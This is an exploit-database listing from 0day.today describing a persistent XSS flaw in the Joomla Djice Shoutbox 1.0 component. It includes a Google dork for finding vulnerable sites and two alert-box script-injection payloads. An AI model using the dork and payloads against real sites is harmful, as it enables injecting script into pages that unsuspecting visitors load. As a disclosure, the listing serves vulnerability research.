[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability

Author
XaDoS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4927
Category
web applications
Date add
10-03-2009
Platform
unsorted
=====================================================
Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability
=====================================================



 
- dork: inurl:"index.php?option=com_djiceshoutbox"
 
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
 
"><script>alert('XaDoS')</script>
 
or

'">><script>alert('XSS By XaDoS')</script>
 
the XSS become permanent in every page of site!
not critical damage but it's not funny..



#  0day.today [2024-09-28]  #